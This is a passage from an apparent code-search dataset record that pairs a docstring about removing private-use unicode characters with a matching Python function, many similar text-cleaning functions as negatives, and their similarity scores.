re.sub(r\"[\\x00-\\x20]+\", \" \", value).strip()", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def fixtags(self, text):\n # french spaces, last one Guillemet-left\n # only if there is something before the space\n text = _guillemetLeftPat.sub(ur'\\1&nbsp;\\2', text)\n # french spaces, Guillemet-right\n text = _guillemetRightPat.sub(ur'\\1&nbsp;', text)\n return text", "def clean_text(some_text):\n # import re\n some_clean_text = re.sub(r'\\n|\\t', '', some_text) # Remove new line and tabs\n some_clean_text = re.sub(' +', ' ', some_clean_text) # Replace multiple spaces with one space\n return some_clean_text", "def remove_punct(self,text):", "def preprocess_input(self, text):\n text = re.sub(r\"([^a-zA-Z0-9 -]+ +[^a-zA-Z0-9 -]*|[^a-zA-Z0-9 -]*\" +\n \" +[^a-zA-Z0-9 -]+)\", ' ', text, flags=re.UNICODE)\n text = re.sub(r\"([^a-zA-Z0-9 -]+$|^[^a-zA-Z0-9 -]+)\", '', text)\n text = re.sub(r\"([a-zA-Z0-9 -]+?)([^a-zA-Z0-9 -])([a-zA-Z0-9 -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE)\n text = re.sub(r\"([\\x00-\\x7F -]+?)([^a-zA-Z0-9 -]+)([\\x00-\\x7F -]+?)\",\n r\"\\1'\\3\", text, flags=re.UNICODE).encode(\"utf-8\")\n return re.sub(r\"([^a-zA-Z0-9 \\-\\'])\", '', text, flags=re.UNICODE)", "def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_chunk(chunk):\n return '\\n'.join([x[1:] for x in chunk.split('\\n')\n if x and x[0] not in ('-', '@')])", "def cleanText(self, stripNonAlphaNumeric=False, stripNumod_byers=False):\n if stripNonAlphaNumeric:\n txt = REG_CLEAN1.sub(\" \", self.getRawText())\n else:\n txt = self.getRawText()\n\n # clean up white spaces\n txt = REG_CLEAN2.sub(\" \", txt)\n if stripNumod_byers:\n txt = REG_CLEAN3.sub(\"\", txt)\n\n self.graph[\"__scope\"] = (0, len(txt))\n self.graph[\"__txt\"] = txt\n if self.getVerbose():\n print(\"cleaned text is now\", self.getText())", "def _remove_extra_whitespaces(self, text: str) -> str:\n return re.sub(\" +\", \" \", text)", "def sanitise(text: str):\n # Removes new lines, weird characters and dialogue\n text = \" \" + text + \" \"\n\n lined_text = text.split(\"\\n\")\n text = \"\"\n # Remove dialogue\n for line in lined_text:\n if \":\" in line:\n if line.index(\":\") < 15:\n index = line.index(\":\") + 1\n else:\n index = 0\n else:\n index = 0\n text = text + \"\\n\" + line[index:]\n\n # Lower case everything\n text = text.lower()\n\n text = text.replace(\"'s\", \" is\")\n text = text.replace(\"'ve\", \" have\")\n text = text.replace(\"n't\", \" not\")\n text = text.replace(\"I'm\", \"I am\")\n text = text.replace(\"'re\", \" are\")\n text = text.replace(\"’s\", \" is\")\n text = text.replace(\"’ve\", \" have\")\n text = text.replace(\"n’t\", \" not\")\n text = text.replace(\"I’m\", \"I am\")\n text = text.replace(\"’re\", \" are\")\n\n # Remove weird characters and double spaces\n weird_characters = [\".\", \",\", \"?\", \"!\", \"'\", \"’\", \"\\\"\", \"\\n\", \"\\t\", \"-\", \"/\", \"[\", \"]\", \"(\", \")\", \":\", \"“\", \"”\"]\n for weird_character in weird_characters:\n text = text.replace(weird_character, \" \")\n\n while \" \" in text:\n text = text.replace(\" \", \" \")\n\n return text", "def fix_missing_period(line):\n if \"@highlight\" in line:\n return line\n if line == \"\":\n return line\n if line[-1] in END_TOKENS:\n return line\n return line + \" .\"", "def fix_horizontal(line):\n\tline = line.rstrip()\n\tline = untabify(line, tab_width)\n\treturn line + '\\n'", "def fixString(string):\n string = re.sub(r\"[^A-Z-]\", \"\", string)\n string = string.strip(\"\\n\")\n return string", "def cleantxt(text):\n return ((text.replace(',', '')).replace('/', ' ')).replace('-', ' ')", "def normalize(self, what):\n txt = strippedtxt(what, [\"\\002\", \"\\003\"])\n txt = re.sub(\"\\s+\", \" \", what)\n txt = stripcolor(txt)\n txt = txt.replace(\"\\002\", \"*\")\n txt = txt.replace(\"<b>\", \"*\")\n txt = txt.replace(\"</b>\", \"*\")\n txt = txt.replace(\"<i>\", \"\")\n txt = txt.replace(\"</i>\", \"\")\n txt = txt.replace(\"&lt;b&gt;\", \"*\")\n txt = txt.replace(\"&lt;/b&gt;\", \"*\")\n txt = txt.replace(\"&lt;i&gt;\", \"\")\n txt = txt.replace(\"&lt;/i&gt;\", \"\")\n return txt", "def clean_emojis_and_smileys(self, tweet):\n smileys = re.findall(self.pattern1, tweet)\n\n for smiley in smileys:\n tweet = tweet.replace(smiley, '')\n\n try:\n highpoints = re.compile(u'[\\U00010000-\\U0010ffff]')\n\n except re.error:\n # UCS-2 build\n highpoints = re.compile(u'[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]')\n\n tweet = highpoints.sub(u'', tweet)\n\n tweet = self.clean_unnecessary_whitespaces(tweet)\n return tweet", "def ungapped(self):\n s = self.sequence\n for sGapChar in GAP_CHARACTERS:\n s = s.replace(sGapChar, '')\n return s", "def remove_at_symbols(text):\n return text.replace('@', '')", "def _sanitize(text):\n # TODO: any cleanup needed here?\n if text is None:\n return None\n text = text.replace('\\n', ' ')\n return text", "def _purify(self, line_str):\n string = line_str.strip('\\n')\n string = string.strip()\n comment_idx = string.find('//')\n if comment_idx == -1:\n return string.strip()\n elif comment_idx == 0:\n return None\n else:\n return string[0:comment_idx].strip()", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def process(self,line):\n\n pattern = re.compile(\"@.*?@\")\n matches = pattern.findall(line)\n for m in matches:\n replacement = r\"<small>{}</small>\".format(re.escape(m[1:-1]))\n line = pattern.sub(replacement,line)\n\n return line", "def clean_str_sst(string):\n string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string)\n string = re.sub(r\"\\s{2,}\", \" \", string)\n return string.strip().lower()", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def strip_line(line):\n line = line.strip()\n line = line.rstrip('\\n')\n line = line.rstrip('\\t')\n line = (line.split(\"//\"))[0]\n return line" ]
[ "0.6750238", "0.6354936", "0.60908276", "0.60867965", "0.6052043", "0.5917007", "0.58838075", "0.58618855", "0.5852398", "0.58450764", "0.5843433", "0.584121", "0.5809004", "0.5809004", "0.5773769", "0.5744268", "0.573116", "0.57237", "0.56972486", "0.5695229", "0.5684892", "0.5674085", "0.56583124", "0.5650387", "0.559185", "0.55685383", "0.5549865", "0.55386126", "0.55377525", "0.5536837", "0.55340606", "0.55254143", "0.55119115", "0.54688764", "0.54623795", "0.54562795", "0.5443397", "0.54376656", "0.5435009", "0.5434793", "0.5426704", "0.54233366", "0.5421047", "0.54106575", "0.53893983", "0.5376921", "0.5367417", "0.536653", "0.5356102", "0.5350136", "0.53461236", "0.53430325", "0.5335932", "0.53352904", "0.53330046", "0.5332036", "0.5325575", "0.53173435", "0.5303478", "0.5301209", "0.52968335", "0.52859926", "0.528207", "0.5272832", "0.52716386", "0.52639437", "0.526229", "0.5259219", "0.525423", "0.52430683", "0.5242863", "0.5238737", "0.52370006", "0.52358514", "0.5207327", "0.52034724", "0.52010167", "0.5197277", "0.5184585", "0.5184585", "0.5180996", "0.5172558", "0.5162926", "0.51590055", "0.51559263", "0.51549375", "0.51537883", "0.51531625", "0.51531047", "0.5151625", "0.51491195", "0.5144987", "0.51435286", "0.5142994", "0.51415694", "0.51393723", "0.5131517", "0.5128602", "0.5126882" ]
0.8284751
1
Cleans the line from private unicode characters and replaces these with space.
def clean_text_from_private_unicode(line): line = re.sub(r"([\uE000-\uF8FF]|\uD83C[\uDF00-\uDFFF]|\uD83D[\uDC00-\uDDFF])", " ", line) return line
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def clean_text_from_geometrical_shape_unicode(line):\n line = re.sub(r\"([\\u25A0-\\u25FF])\", \" \", line)\n return line", "def RemoveNonUtf8BadChars(line):\n return \"\".join([ch for ch in line if ch in printable])", "def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line", "def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def prepare_text_line(line):\n\n re_sub = re.sub\n # FIXME: maintain the original character positions\n\n # strip whitespace\n line = line.strip()\n\n # strip comment markers\n # common comment characters\n line = line.strip('\\\\/*#%;')\n # un common comment line prefix in dos\n line = re_sub('^rem\\s+', ' ', line)\n line = re_sub('^\\@rem\\s+', ' ', line)\n # un common comment line prefix in autotools am/in\n line = re_sub('^dnl\\s+', ' ', line)\n # un common comment line prefix in man pages\n line = re_sub('^\\.\\\\\\\\\"', ' ', line)\n # un common pipe chars in some ascii art\n line = line.replace('|', ' ')\n\n # normalize copyright signs and spacing aournd them\n line = line.replace('(C)', ' (c) ')\n line = line.replace('(c)', ' (c) ')\n # the case of \\251 is tested by 'weirdencoding.h'\n line = line.replace(u'\\251', u' (c) ')\n line = line.replace('&copy;', ' (c) ')\n line = line.replace('&#169;', ' (c) ')\n line = line.replace('&#xa9;', ' (c) ')\n line = line.replace(u'\\xa9', ' (c) ')\n # FIXME: what is \\xc2???\n line = line.replace(u'\\xc2', '')\n\n # TODO: add more HTML entities replacements\n # see http://www.htmlhelp.com/reference/html40/entities/special.html\n # convert html entities &#13;&#10; CR LF to space\n line = line.replace(u'&#13;&#10;', ' ')\n line = line.replace(u'&#13;', ' ')\n line = line.replace(u'&#10;', ' ')\n\n # normalize (possibly repeated) quotes to unique single quote '\n # backticks ` and \"\n line = line.replace(u'`', \"'\")\n line = line.replace(u'\"', \"'\")\n line = re.sub(MULTIQUOTES_RE(), \"'\", line)\n # quotes to space? but t'so will be wrecked\n # line = line.replace(u\"'\", ' ')\n\n # some trailing garbage ')\n line = line.replace(\"')\", ' ')\n\n\n # note that we do not replace the debian tag by a space: we remove it\n line = re_sub(DEBIAN_COPYRIGHT_TAGS_RE(), '', line)\n\n line = re_sub(IGNORED_PUNCTUATION_RE(), ' ', line)\n\n # tabs to spaces\n line = line.replace('\\t', ' ')\n\n # normalize spaces around commas\n line = line.replace(' , ', ', ')\n\n # remove ASCII \"line decorations\"\n # such as in --- or === or !!! or *****\n line = re_sub(ASCII_LINE_DECO_RE(), ' ', line)\n line = re_sub(ASCII_LINE_DECO2_RE(), ' ', line)\n\n # Replace escaped literal \\0 \\n \\r \\t that may exist as-is by a space\n # such as in code literals: a=\"\\\\n some text\"\n line = line.replace('\\\\r', ' ')\n line = line.replace('\\\\n', ' ')\n line = line.replace('\\\\t', ' ')\n line = line.replace('\\\\0', ' ')\n\n # TODO: Why?\n # replace contiguous spaces with only one occurrence\n # line = re.sub(WHITESPACE_RE(), ' ', text)\n\n # normalize to ascii text\n line = commoncode.text.toascii(line)\n # logger.debug(\"ascii_only_text: \" + text)\n\n # strip verbatim back slash and comment signs again at both ends of a line\n # FIXME: this is done at the start of this function already\n line = line.strip('\\\\/*#%;')\n\n # normalize to use only LF as line endings so we can split correctly\n # and keep line endings\n line = commoncode.text.unixlinesep(line)\n # why?\n line = lowercase_well_known_word(line)\n\n return line", "def clean(line):\n line = line.lower().replace(\"\\n\",\" \").replace(\"\\r\",\"\").replace(',',\"\").replace(\">\",\"> \").replace(\"<\", \" <\").replace(\"|\",\" \")\n return line", "def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")", "def unlines(line):\n\n return line.translate(str.maketrans('\\n', ' '))", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text", "def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def strip_other_charcter():\n pass", "def quote( self, aLine ):\n clean= aLine\n for from_, to_ in self.quoted_chars:\n clean= clean.replace( from_, to_ )\n return clean", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet", "def cleaning_up(self):\n # find all non-letter-no-digit except whitespace and \"-\"\n try:\n pattern = re.compile(\"[a-zA-Z0-9\\\\s\\\\-]\")\n badChars = re.sub(pattern, '', string.printable)\n logging.debug(\"Bad chars: {}\".format(badChars))\n # define translate table\n remap = dict.fromkeys(badChars)\n logging.debug(remap)\n table = str.maketrans(remap)\n result = \"\"\n with open(self.input) as infile:\n lines = (line.strip() for line in infile)\n for line in lines:\n if len(line) == 0:\n continue\n else:\n logging.debug(line)\n result = result + \" \" + line.translate(table)\n # Since the input file only has one line, we can use the following\n # code. For general use, I kept above code.\n # result = line.translate(remap)\n # break;\n except LookupError as e:\n logging.exception(\"Lookup Error: {}\".format(e.strerror))\n except IOError as e:\n logging.exception(\"IO Error: {}\".format(e.strerror))\n except:\n logging.exception(\"Unknown Error\")\n return result.strip()", "def sanitize_characters(raw_input_file, clean_output_file):\n input_file = codecs.open(raw_input_file, 'r', encoding='ascii', errors='ignore')\n output_file = open(clean_output_file, 'w', encoding='ascii', errors='ignore')\n\n for line in input_file:\n # removes extra newline\n line = line.rstrip('\\n')\n output_file.write(line)", "def clean_line(line, normNum=True, normProf=True):\n\n # Remove square brackets, ceiling characters, question marks, other\n # questionable characters, and line breaks\n line = re.sub(r'(\\[|\\])', '', line)\n line = re.sub(r'(⌈|⌉)', '', line)\n line = re.sub(r'( / )', ' ', line)\n line = re.sub(r'/', '', line)\n line = re.sub(r'\\?', '', line)\n line = re.sub(r'([<]|[>])+', '', line)\n line = re.sub(r'!', '', line)\n line = re.sub(r'\"', '', line)\n\n # Remove researcher's notes, and multiple dashes or '='s\n line = re.sub(r'(\\(.*\\))', '', line)\n line = re.sub(r'(#[.]*)', '', line)\n line = re.sub(r'[-]{2}', '', line)\n line = re.sub(r'[=]{2}', '', line)\n\n # Replace numbers with 'number'\n if normNum is True:\n line = re.sub(r'\\b(?<!-)(\\d+)(?![\\w-])', 'number', line)\n line = re.sub(r'[-+]?\\b\\d+\\b', 'number', line)\n\n #line = re.sub(r'\\b([\\-\\.0-9]+)(?![\\w-])', 'number', line)\n\n # Replace professions with 'profession'\n if normProf is True:\n line = professions.replaceProfessions(line)\n\n # Remove blank character at end of line\n linelength = len(line)\n if (linelength > 0 and line[linelength-1] == \"\"):\n del line[0:linelength-2]\n\n return line", "def clean(text):\n new = text.replace(\"\\r\", \"\")\n new = new.replace(\"\\t\", \"\")\n new = new.replace(\"\\n\", \"\")\n new = new.replace(\"- \", \"-\")\n new = new.replace(\" \", \" \")\n return new", "def _removeWhitespaces(self, s):\n return s.translate({ord(c): None for c in string.whitespace})", "def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt", "def clean_txt(txt):\n r = txt.encode(\"utf-8\", errors=\"backslashreplace\").decode('utf-8').replace(\"\\\\u0144\", \"\")\n return r", "def clean(sent):\n p1 = re.compile('\\W')\n p2 = re.compile('\\s+')\n sent = re.sub(r\"http\\S+\", \"\", sent)\n sent = ReplaceThreeOrMore(sent)\n sent = remove_unicode_diac(sent)\n sent = sent.replace('_', ' ')\n sent = re.sub(r'[A-Za-z0-9]', r'', sent)\n sent = re.sub(p1, ' ', sent)\n sent = re.sub(p2, ' ', sent)\n return sent", "def _hidden_in_unicode(self, txt):", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])", "def CLEAN(text):\n return _control_char_re.sub('', text)", "def filter_blanks(user, str):\n return re.sub(r'\\n{2}\\n+', '\\n', str)", "def _chop_end_misc(line):\n return re.sub(r\"\\s+\\d\\d-\\w\\w\\w-\\d\\d\\s+[1-9][0-9A-Z]{3}\\s*\\Z\", \"\", line)", "def clean_non_chinese_symbols(text):\n text = regex.sub('[!!]+', \"!\", text)\n text = regex.sub('[??]+', \"?\", text)\n text = regex.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" UNK \", text)\n return regex.sub(\"\\s+\", \" \", text)", "def clean_whitespace(text):\n return text\n #return re.sub(r'\\r\\n|\\n', \"\\t\", text)", "def removeUnicode(text):\n text = re.sub(r'(\\\\u[0-9A-Fa-f]+)',r'', text) \n text = re.sub(r'[^\\x00-\\x7f]',r'',text)\n return text", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clean_chunk(chunk):\n return '\\n'.join([x[1:] for x in chunk.split('\\n')\n if x and x[0] not in ('-', '@')])", "def process(line, form):\n return unicodedata.normalize(form, line)", "def strip_warnings(self, line):\n if line[0] == \"|\":\n return \"\"\n else:\n return line", "def stripUnderline(self, s):\n return s.replace('\\x1f', '').replace('\\x1F', '')", "def _removeDiacritics(self, text):\n norm_txt = unicodedata.normalize('NFD', text)\n shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))\n # remove accents and other diacritics, replace spaces with \"_\" because identifiers can't have spaces\n no_spaces = unicodedata.normalize(\n 'NFC', shaved).lower().replace(\" \", \"_\")\n final_text = no_spaces\n # only allow [a-z], [0-9] and _\n p = re.compile('[a-z0-9_]+')\n for i in range(0, len(no_spaces)):\n if not (p.match(no_spaces[i])):\n final_text = final_text[:i] + '_' + final_text[i+1:]\n # i the first char is not a-z then replaceit (all identifiers must start with a letter)\n p2 = re.compile('[a-z]+')\n if not p2.match(final_text[0]):\n final_text = 'a' + final_text[1:]\n return final_text", "def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence", "def clean_text_from_latin_supplement_unicode(text):\n return re.sub(r\"([\\u0080-\\u00FF])\", \" \", text)", "def clean_text_from_latin_supplement_unicode(text):\n return re.sub(r\"([\\u0080-\\u00FF])\", \" \", text)", "def test__clean_line():\n LINES = {\n \"One morn before me were three figures seen,\":\n \"One morn before me were three figures seen,\",\n \"And once—more came they by:-alas! wherefore?\":\n \"And once more came they by: alas! wherefore?\",\n }\n for line, clean_line in LINES.items():\n assert(LineBuilder(line)._clean_line() == clean_line)", "def sanitise(text: str):\n # Removes new lines, weird characters and dialogue\n text = \" \" + text + \" \"\n\n lined_text = text.split(\"\\n\")\n text = \"\"\n # Remove dialogue\n for line in lined_text:\n if \":\" in line:\n if line.index(\":\") < 15:\n index = line.index(\":\") + 1\n else:\n index = 0\n else:\n index = 0\n text = text + \"\\n\" + line[index:]\n\n # Lower case everything\n text = text.lower()\n\n text = text.replace(\"'s\", \" is\")\n text = text.replace(\"'ve\", \" have\")\n text = text.replace(\"n't\", \" not\")\n text = text.replace(\"I'm\", \"I am\")\n text = text.replace(\"'re\", \" are\")\n text = text.replace(\"’s\", \" is\")\n text = text.replace(\"’ve\", \" have\")\n text = text.replace(\"n’t\", \" not\")\n text = text.replace(\"I’m\", \"I am\")\n text = text.replace(\"’re\", \" are\")\n\n # Remove weird characters and double spaces\n weird_characters = [\".\", \",\", \"?\", \"!\", \"'\", \"’\", \"\\\"\", \"\\n\", \"\\t\", \"-\", \"/\", \"[\", \"]\", \"(\", \")\", \":\", \"“\", \"”\"]\n for weird_character in weird_characters:\n text = text.replace(weird_character, \" \")\n\n while \" \" in text:\n text = text.replace(\" \", \" \")\n\n return text", "def squeeze(value):\r\n return re.sub(r\"[\\x00-\\x20]+\", \" \", value).strip()", "def remove_unicode_diac(text):\n # Replace diacritics with nothing\n text = text.replace(u\"\\u064B\", \"\") # fatHatayn\n text = text.replace(u\"\\u064C\", \"\") # Dammatayn\n text = text.replace(u\"\\u064D\", \"\") # kasratayn\n text = text.replace(u\"\\u064E\", \"\") # fatHa\n text = text.replace(u\"\\u064F\", \"\") # Damma\n text = text.replace(u\"\\u0650\", \"\") # kasra\n text = text.replace(u\"\\u0651\", \"\") # shaddah\n text = text.replace(u\"\\u0652\", \"\") # sukuun\n text = text.replace(u\"\\u0670\", \"`\") # dagger 'alif\n return text", "def pre_process_line(self, line):\n\n line = line.lower()\n line = line.translate(co.NORM_TABLE)\n line = line.translate(co.PUNC_TABLE)\n line = line.split()\n line = line[self.configs[\"resources\"][self.resource_type][\"lstrip\"]:]\n if self.configs[\"resources\"][self.resource_type][\"rstrip\"]:\n line = line[:-self.configs[\"resources\"][self.resource_type][\"rstrip\"]]\n return \" \".join(line)", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def sanitize(buf,\n backspaces=['\\x08\\x1b[K', '\\x08 \\x08'],\n escape_regex=re.compile(r'\\x1b(\\[|\\]|\\(|\\))[;?0-9]*[0-9A-Za-z](.*\\x07)?')):\n # Filter out control characters\n\n # First, handle the backspaces.\n for backspace in backspaces:\n try:\n while True:\n ind = buf.index(backspace)\n buf = ''.join((buf[0:ind-1],buf[ind+len(backspace):]))\n except:\n pass\n\n strip_escapes = escape_regex.sub('',buf)\n\n # strip non-printable ASCII characters\n\n clean = ''.join([x for x in strip_escapes if is_printable(x)])\n return clean", "def clean_header(klass, s):\n return re.sub(r\"[\\n\\r\\t]+\", \" \", s).strip()", "def replace_and_print(line_list):\n line_list = line_list.replace('0', ' ')\n line_list = line_list.replace('1', u\"\\u2588\")\n print(line_list)", "def clean(self, x): # should not contain any other arguments (use fields set in constructor instead).\n\n def repl(m):\n return chr(int('0x' + m.group(1), 16))\n\n # replace double escaped \"\\\\\" unicode strings with their unicode characters\n x = [re.sub(r'\\\\n', '\\n', message) for message in x]\n x = [re.sub(r'\\\\x([a-f0-9]{2})', repl, message) for message in x]\n x = [re.sub(r'\\\\u([a-f0-9]{4})', repl, message) for message in x]\n if self.ignore_urls:\n x = [re.sub(self.re_url, '', message) for message in x]\n\n if self.fix_contractions:\n import contractions\n x = [contractions.fix(message) for message in x]\n\n if self.remove_foreign_characters:\n # replace accented characters with unaccented\n x = [unidecode.unidecode(message) for message in x]\n\n # replace nonascii characters with space\n x = [''.join(character if ord(character) < 128 else ' ' for character in message) for message in x]\n\n # Create sentence structure like nltk gutenberg.sents()\n # list of sentences for each message:\n x = [self.sent_detector.tokenize(message.strip()) for message in x]\n # list of list of words for each message/sentence:\n x = [[self.word_tokenizer.tokenize(sentence) for sentence in message] for message in x]\n\n if self.lower:\n # lower_sents: lowercase words ignoring punctuation\n x = [[[\n word.lower() for word in sentence] for sentence in message\n ] for message in x]\n\n if self.remove_punctuation:\n x = [[[\n word for word in sentence if word not in list(string.punctuation)] for sentence in message\n ] for message in x]\n\n if self.stem:\n x = [[[self.stemmer.stem(word) for word in sentence] for sentence in message] for message in x]\n\n if self.lower and self.bigrams:\n # clean_sents: replace common adjacent words with bigrams\n x = [[self.bigram[sentence] for sentence in message] for message in x]\n\n if self.omit_stopwords:\n x = [[[word for word in sentence if word not in stopwords.words('english')] for sentence in message] for\n message in x]\n\n # convert back to one string per message (join words into sentences and sentences into messages)\n x = ['\\n'.join(' '.join(sentence) for sentence in message) for message in x]\n return x", "def _prune_ansi(line):\n\n pattern = re.compile('\\x1b[^m]+m')\n match = pattern.search(line)\n while match:\n index = line.find(match.group(0))\n line = line[:index] + line[index+len(match.group(0)):]\n match = pattern.search(line)\n return line", "def cleanSents(row, field):\n\n text = str(row[field]).lower()\n clean_text = re.sub('[^A-Za-z0-9]+', ' ', text).strip()\n return clean_text", "def clean_line(self, line):\n\n if \"#\" in line:\n temp = line.split(\"#\")\n if len(temp) < 2:\n return \"\"\n else:\n temp = temp[0] + \"\\n\"\n\n # make sure the \"#\" isn't in quotes\n if temp.count(\"\\\"\") % 2 == 0:\n line = temp\n\n line = line.replace(\"}\", \" } \").replace(\"{\", \" { \")\n while \"=\" in line:\n line = self.replace_equals(line)\n line = line.lstrip()\n return line", "def clear_line(string):\n for character in string:\n #backtrack-whitespace-backtrack\n sys.stdout.write(\"\\b \\b\")", "def clean_text(text):\n text = text.replace(\"\\uf0b7\", \" \")\n text = text.replace(\":\", \" \")\n text = text.replace(\".\", \" \")\n text = text.replace(\",\", \" \")\n text = text.replace(\"/\", \" \")\n text = text.replace(\"(\", \" \")\n text = text.replace(\")\", \" \")\n text = text.replace(\"[\", \" \")\n text = text.replace(\"]\", \" \")\n text = text.replace(\"+\", \" \")\n text = text.replace(\"?\", \" \")\n text = text.replace(\"*\", \" \")\n text = text.replace(\"#\", \" \")\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n text = re.sub(\" $\", \"\", text)\n return text", "def sanitize(s):\n s = s.replace(\"_\", \"\\\\_\")\n return s", "def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)", "def Clean(s):\n for c in BAD_CHARACTERS:\n s = s.replace(c, '_')\n return s", "def remove_space(line):\n split_line = line.split()\n return \"\".join(split_line)", "def clean_text(text):\n return(re.sub(\" {2,}|\\r|\\n\",\"\", text))", "def fix_text(text):\n ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))\n text = text.replace('\\n', '')\n text = text.upper()\n\n return text.strip()", "def clean_line(line: str) -> str:\n tokens = re.sub('[^a-z0-9 ]+', ' ', line.lower()).split(' ')\n stemmed_tokens = [w for w in tokens if len(w) > 2]\n return ' '.join(stemmed_tokens)", "def safe(self, string):\n if sys.version_info.major >= 3 and isinstance(string, bytes):\n string = string.decode('utf8')\n elif sys.version_info.major < 3:\n if not isinstance(string, unicode):\n string = unicode(string, encoding='utf8')\n string = string.replace('\\n', '')\n string = string.replace('\\r', '')\n return string", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = 